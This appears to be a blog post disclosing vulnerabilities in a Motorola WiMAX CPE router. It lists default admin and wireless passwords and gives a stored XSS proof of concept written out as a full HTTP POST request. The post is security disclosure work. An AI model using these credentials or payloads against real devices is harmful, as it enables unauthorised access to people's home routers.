Motorola Wimax CPE Multiple Vulnerabilities

The Motorola Wimax CPE (Shodan search) contains multiple vulnerabilities. I tested the following: Model ID: CPEi25890, Hardware Version: REV.B, version WMX04.00.01.02.23

#1 Default Password

The initial GET request to the router will call a POST request to http://1.2.3.4./cgi-bin/f1_fcgi_cgi.fcgi. In the body of the response, the default password is shown. For the first time install, it is even auto-filled in for you too!

motorola01

It looks like some ISPs may set a different password, but remote firmware updates may reset it based on this article. You can confirm the default password in the CPEi 725 Series manual too:

In the Password field, type the password (default is motorola)

#2 Stored XSS

An authenticated user can change the device name to include script code.

POST /cgi-bin/f1_fcgi_cgi.fcgi?timeStamp=1389922654157 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: https://1.2.3.4/cgi-bin/f1_fcgi_cgi.fcgi
Connection: Keep-Alive
Content-Length: 161
Content-Type: text/html

set.lan.LAN.X_MOT_DeviceName=mywimax”>alert(‘DF’)&nextpage=%2Fusr%2Fbin%2Fwww%2Fhtml%2Fpersonalize%2Fpersonalize_devicename.html&multiget=Modify

motorola02

#3 Default Wireless Passphrase?

The Wimax devices appear to come with a default wireless passphrase in addition to the device password.

motorola03

The wifi_home.@WLANConfiguration[0].PreSharedKey1_KeyPassphrase is always motorola and the wifi_home.@WLANConfiguration[0].PreSharedKey2_KeyPassphrase is the user defined wireless password. Not sure if this means that ‘motorola’ is a backdoor password or just not used. Either way, it is sent over the network in cleartext when the /cgi-bin/f1_fcgi_cgi.fcgi script makes a call to /etc/www/html/wifi/wifi_security.html via the nextpage parameter.

Advertisements

Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: